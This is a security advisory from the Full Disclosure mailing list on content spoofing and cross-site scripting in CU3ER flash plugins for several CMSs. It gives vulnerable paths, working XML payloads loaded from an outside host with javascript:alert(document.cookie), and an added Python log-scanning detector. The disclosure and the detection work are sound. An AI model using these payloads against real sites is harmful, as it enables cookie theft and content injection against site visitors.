Full Disclosure mailing list archives
Vulnerabilities in plugins with CU3ER for WordPress, Joomla, SilverStripe and Plone
From: "MustLive" <mustlive () websecurity com ua>
Date: Sun, 20 Apr 2014 14:11:00 +0300
Hello list!

Recently I disclosed vulnerabilities in CU3ER (http://seclists.org/fulldisclosure/2014/Apr/244). This is a popular flash file and in Google's index there are up to a million web sites with it (inurl:cu3er.swf filetype:swf - now Google shows 994000 results). There are many plugins for different CMS with CU3ER.

These are Content Spoofing and Cross-Site Scripting vulnerabilities in plugins with CU3ER for WordPress, Joomla, SilverStripe and Plone. Such plugins as: wpCU3ER for WordPress, jCU3ER and Vinaora Cu3er 3D Slide-show for Joomla, cu3er-silverstripe-extension for SilverStripe, collective.cu3er for Plone.

-------------------------
Affected products:
-------------------------

Vulnerable are all plugins with flash file of CU3ER.

Vulnerable are wpCU3ER 0.75 and previous versions.

Vulnerable are jCU3ER 0.12 and previous versions.

Vulnerable are Vinaora Cu3er 3D Slide-show 1.2.1, 2.5.3, 3.1.1 and previous versions.

Vulnerable are all versions of cu3er-silverstripe-extension.

Vulnerable are collective.cu3er 0.1 and previous versions.

-------------------------
Affected vendors:
-------------------------

MADEBYPLAY (wpCU3ER and jCU3ER)
http://getcu3er.com

Vinaora
http://code.google.com/p/vinaora-3d-slideshow

Matt Clegg
http://www.silverstripe.org/cu3er-silverstripe-extension-module

Thomas Massmann
https://pypi.python.org/pypi/collective.cu3er/0.1

----------
Details:
----------

Path to flash-file in different plugins:

http://site/wp-content/uploads/wpcu3er/CU3ER.swf

In old versions of the plugin:

http://site/wp-content/plugins/wp-cu3er/cu3er.swf
http://site/wp-content/plugins/wp-cu3er/assets/cu3er/cu3er.swf

http://site/components/com_cu3er/flash/CU3ER.swf
http://site/media/mod_vinaora_cu3er/flash/cu3er.swf
http://site/cu3er-silverstripe-extension/flash/cu3er.swf
http://site/collective/cu3er/browser/flash/cu3er.swf

The first two plugins use the last version of CU3ER, and three others use version 0.9.2 (and also in old versions of wp-cu3er).

Content Spoofing (Content Injection) (WASC-12):

http://site/cu3er.swf?xml=http://site2/1.xml

File 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
  <slides>
    <slide>
      <url>1.jpg</url>
      <link>http://websecurity.com.ua</link>
    </slide>
  </slides>
</cu3er>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml=http://site2/xss.xml

File xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
  <slides>
    <slide>
      <url>1.jpg</url>
      <link>javascript:alert(document.cookie)</link>
    </slide>
  </slides>
</cu3er>

For cross-domain attacks it's needed to have crossdomain.xml at web site with xml-files.

These are examples of CS and XSS attacks on version CU3ER 0.9.2. For the last version 1.24 it's needed different xml-files and different parameter is set to flash-file.

Content Spoofing (WASC-12):

http://site/cu3er.swf?xml_location=http://site2/1.xml

File 1.xml:

<data>
  <project_settings>
    <width>800</width>
    <height>600</height>
  </project_settings>
  <settings>
    <folder_images>/</folder_images>
    <start_slide>1</start_slide>
    <auto_play>true</auto_play>
    <randomize_slides>false</randomize_slides>
    <pause_on_rollover>true</pause_on_rollover>
  </settings>
  <preloader type="linear" align_pos="MC" width="200" height="20" x="0" y="0">
  </preloader>
  <controls>
    <prev_button align_pos="BR" width="30" height="30" x="-51" y="-20">
      <auto_hide time="3">false</auto_hide>
      <hide_on_transition>true</hide_on_transition>
      <background round_corners="15,0,0,15">
        <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1" scaleY="1"/>
        <tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1" scaleY="1"/>
        <tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1" scaleY="1"/>
      </background>
      <symbol type="2" align_pos="MC" x="0" y="0">
        <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
        <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
        <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
      </symbol>
    </prev_button>
    <next_button align_pos="BR" width="30" height="30" x="-20" y="-20">
      <auto_hide time="3">false</auto_hide>
      <hide_on_transition>true</hide_on_transition>
      <background round_corners="0,15,15,0">
        <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/>
        <tweenOver tint="0xffffff" alpha="0.9"/>
        <tweenHide tint="0xffffff" alpha="0"/>
      </background>
      <symbol type="2" align_pos="MC" x="0" y="0">
        <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
        <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
        <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
      </symbol>
    </next_button>
  </controls>
  <defaults>
    <slide time="5" color="0x000000">
      <image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/>
      <link>http://websecurity.com.ua</link>
    </slide>
  </defaults>
  <slides>
    <slide>
      <url><![CDATA[1.jpg]]></url>
    </slide>
    <transition rows="3" columns="5"/>
    <slide>
      <url><![CDATA[1.jpg]]></url>
    </slide>
  </slides>
</data>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml_location=http://site2/xss.xml

File xss.xml:

<data>
  <project_settings>
    <width>800</width>
    <height>600</height>
  </project_settings>
  <settings>
    <folder_images>/</folder_images>
    <start_slide>1</start_slide>
    <auto_play>true</auto_play>
    <randomize_slides>false</randomize_slides>
    <pause_on_rollover>true</pause_on_rollover>
  </settings>
  <preloader type="linear" align_pos="MC" width="200" height="20" x="0" y="0">
  </preloader>
  <controls>
    <prev_button align_pos="BR" width="30" height="30" x="-51" y="-20">
      <auto_hide time="3">false</auto_hide>
      <hide_on_transition>true</hide_on_transition>
      <background round_corners="15,0,0,15">
        <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1" scaleY="1"/>
        <tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1" scaleY="1"/>
        <tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1" scaleY="1"/>
      </background>
      <symbol type="2" align_pos="MC" x="0" y="0">
        <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
        <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
        <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
      </symbol>
    </prev_button>
    <next_button align_pos="BR" width="30" height="30" x="-20" y="-20">
      <auto_hide time="3">false</auto_hide>
      <hide_on_transition>true</hide_on_transition>
      <background round_corners="0,15,15,0">
        <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/>
        <tweenOver tint="0xffffff" alpha="0.9"/>
        <tweenHide tint="0xffffff" alpha="0"/>
      </background>
      <symbol type="2" align_pos="MC" x="0" y="0">
        <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
        <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
        <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
      </symbol>
    </next_button>
  </controls>
  <defaults>
    <slide time="5" color="0x000000">
      <image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/>
      <link>javascript:alert(document.cookie)</link>
    </slide>
  </defaults>
  <slides>
    <slide>
      <url><![CDATA[1.jpg]]></url>
    </slide>
    <transition rows="3" columns="5"/>
    <slide>
      <url><![CDATA[1.jpg]]></url>
    </slide>
  </slides>
</data>

------------
Timeline:
------------

2013.11.22 - announced at my site about CU3ER.
2013.11.26 - informed developer.
2013.11.26 - announced at my site about plugins. Later informed developers of the plugins.
2014.04.18 - disclosed at my site (http://websecurity.com.ua/6893/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
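
Added example, not part of the original post or of any plugin's code: a detection sketch that scans web server access logs for requests to cu3er.swf whose xml or xml_location parameter points at a host other than the site's own, which is the pattern both issues above rely on. The log format (combined), the sample lines, and the host names www.example.org and site2.example are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Loader parameters from the advisory: "xml" (CU3ER 0.9.2), "xml_location" (1.24).
LOADER_PARAMS = {"xml", "xml_location"}
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def external_config_host(target, site_hosts):
    """Return the off-site host a cu3er.swf request loads its XML from, else None."""
    try:
        parts = urlsplit(target)
    except ValueError:
        return None  # request target itself is not parseable
    if not parts.path.lower().endswith("/cu3er.swf"):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() not in LOADER_PARAMS:
            continue
        try:
            host = urlsplit(value.strip()).hostname  # None for relative paths
        except ValueError:
            return "<unparseable>"  # malformed URL in a loader parameter: report it
        if host and host.lower() not in site_hosts:
            return host.lower()
    return None

def scan(log_lines, site_hosts):
    """Return [(line_number, external_host)] for suspicious access-log lines."""
    hosts = {h.lower() for h in site_hosts}
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        host = external_config_host(match.group(1), hosts) if match else None
        if host:
            hits.append((number, host))
    return hits

# Constructed sample lines in combined log format; hosts and addresses are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Apr/2014:14:11:00 +0300] "GET /wp-content/uploads/wpcu3er/CU3ER.swf?xml_location=http%3A%2F%2Fsite2.example%2Fxss.xml HTTP/1.1" 200 51234',
    '203.0.113.9 - - [20/Apr/2014:14:12:00 +0300] "GET /media/mod_vinaora_cu3er/flash/cu3er.swf?xml=/media/mod_vinaora_cu3er/config.xml HTTP/1.1" 200 51234',
    '198.51.100.7 - - [20/Apr/2014:14:13:00 +0300] "GET /components/com_cu3er/flash/CU3ER.swf?xml=//site2.example/1.xml HTTP/1.1" 200 51234',
    '198.51.100.7 - - [20/Apr/2014:14:14:00 +0300] "GET /index.php?xml=http://site2.example/1.xml HTTP/1.1" 200 100',
    '198.51.100.8 - - [20/Apr/2014:14:15:00 +0300] "GET /cu3er-silverstripe-extension/flash/cu3er.swf?xml=http://www.example.org/slides.xml HTTP/1.1" 200 51234',
]

if __name__ == "__main__":
    for number, host in scan(SAMPLE_LOG, {"www.example.org"}):
        print(f"line {number}: cu3er.swf told to load config from {host}")
```

Pass every host name the site legitimately serves its slideshow XML from as site_hosts; relative and same-host values are treated as normal plugin use.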